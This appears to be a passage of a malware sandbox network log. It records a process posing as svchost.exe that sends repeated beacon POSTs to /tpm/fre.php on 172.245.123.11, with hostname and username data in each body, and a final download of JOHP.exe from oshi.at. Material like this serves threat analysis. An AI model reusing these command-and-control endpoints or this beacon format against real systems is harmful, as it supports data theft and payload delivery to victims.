                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:31.244743109 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:31 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              134192.168.2.550112172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:31.401582956 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:31.406579971 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:31.926682949 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:31 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              135192.168.2.550113172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:32.062737942 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:32.067626953 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:32.585803032 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:32 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              136192.168.2.550114172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:32.729106903 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:32.733952999 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:33.260466099 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:33 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              137192.168.2.550115172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:33.428402901 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:33.433269978 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:34.641026974 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:33 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.
                                                              Jan 7, 2025 11:03:34.641077995 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:33 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.
                                                              Jan 7, 2025 11:03:34.641210079 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:33 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              138192.168.2.550116172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:34.777829885 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:34.782674074 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:35.284744978 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:35 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              139192.168.2.550117172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:35.417725086 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:35.422765970 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:35.968166113 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:35 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              140192.168.2.550118172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:36.106273890 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:36.111249924 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:36.632415056 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:36 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              141192.168.2.550119172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:36.780884027 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:36.787347078 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:37.297065020 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:37 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              142192.168.2.550120172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:37.437613010 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:37.443278074 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:37.931905031 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:37 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              143192.168.2.550121172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:38.073981047 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:38.078880072 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:38.582405090 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:38 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              144192.168.2.550122172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:38.715842962 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:38.720674038 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:39.249047995 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:39 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              145192.168.2.550123172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:39.385117054 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:39.392735958 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:39.917833090 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:39 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              146192.168.2.550124172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:40.057842016 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:40.062714100 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:40.576606035 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:40 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              147192.168.2.550125172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:40.719878912 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:40.725261927 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:41.226413012 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:41 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              148192.168.2.550126172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:41.422121048 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:41.427015066 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:41.941040993 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:41 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              149192.168.2.550127172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:03:42.072987080 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:03:42.077853918 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:03:42.581815004 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:03:42 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549707194.15.112.2484436784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-07 10:01:59 UTC273OUTGET /rtBS?N HTTP/1.1
                                                              Accept: */*
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                              Host: oshi.at
                                                              Connection: Keep-Alive
                                                              2025-01-07 10:02:00 UTC315INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 07 Jan 2025 10:02:00 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 57976
                                                              Connection: close
                                                              Last-Modified: Tue, 07 Jan 2025 09:18:52 GMT
                                                              Accept-Ranges: bytes
                                                              Content-Disposition: attachment; filename=JOHP.exe
                                                              ETag: "83fa8ab5146bf537d9fabe59096863cf"
